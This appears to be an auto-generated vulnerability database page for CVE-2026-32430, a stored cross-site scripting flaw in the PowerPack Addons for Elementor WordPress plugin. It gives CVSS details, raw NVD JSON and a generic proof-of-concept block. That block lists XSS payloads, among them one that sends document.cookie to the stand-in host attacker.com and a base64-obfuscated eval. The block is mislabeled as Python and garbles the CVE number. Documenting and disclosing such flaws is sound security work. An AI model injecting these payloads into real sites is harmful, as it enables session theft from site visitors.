Security Vulnerability Report
中文
CVE-2026-32430 CVSS 6.5 MEDIUM

CVE-2026-32430

Published: 2026-03-13 19:55:02
Last Modified: 2026-04-22 21:30:26

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in IdeaBox Creations PowerPack Addons for Elementor powerpack-lite-for-elementor allows Stored XSS.This issue affects PowerPack Addons for Elementor: from n/a through <= 2.9.9.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

PowerPack Addons for Elementor <= 2.9.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-2026-32430 Stored XSS PoC for PowerPack Addons for Elementor // Affected: PowerPack Addons for Elementor <= 2.9.9 // Author: Security Researcher // Note: This PoC demonstrates the vulnerability structure. Actual exploitation requires: // 1. Valid WordPress account (subscriber role or higher) // 2. Access to plugin's input fields (e.g., heading, text block, button widgets) // Example malicious payload - can be injected through plugin input fields: const maliciousPayload = [ // Method 1: Script tag injection '<script>console.log("XSS Triggered")</script>', // Method 2: Event handler injection '<img src=x onerror="alert(document.cookie)">', // Method 3: SVG-based injection '<svg/onload=fetch("https://attacker.com/steal?c="+document.cookie)>', // Method 4: JavaScript protocol injection '<a href="javascript:alert(document.domain)">Click me</a>', // Method 5: Body event handler '<body onload="eval(atob(\'YWxlcnQoJ1hTUyBFeHBsb2l0ZWQnKQ==\'))">' ]; // Example exploitation flow: // 1. Attacker creates/edits a page with Elementor // 2. Attacker adds PowerPack widget (e.g., Advanced Heading) // 3. Attacker injects malicious payload in text input fields // 4. Payload is saved to database (stored XSS) // 5. When victim visits the page, payload executes in their browser // Recommended remediation: // - Upgrade to PowerPack Addons for Elementor > 2.9.9 // - Implement proper input sanitization using wp_kses() // - Use output escaping functions like esc_html(), esc_attr() console.log('CVE-2026-32430 PoC - Stored XSS in PowerPack Addons for Elementor');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32430", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:02.210", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in IdeaBox Creations PowerPack Addons for Elementor powerpack-lite-for-elementor allows Stored XSS.This issue affects PowerPack Addons for Elementor: from n/a through <= 2.9.9."}, {"lang": "es", "value": "La vulnerabilidad de 'Neutralización inadecuada de la entrada durante la generación de páginas web' ('cross-site scripting') en IdeaBox Creations PowerPack Addons for Elementor powerpack-lite-for-elementor permite XSS Almacenado. Este problema afecta a PowerPack Addons for Elementor: desde n/d hasta &lt;= 2.9.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/powerpack-lite-for-elementor/vulnerability/wordpress-powerpack-addons-for-elementor-plugin-2-9-9-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}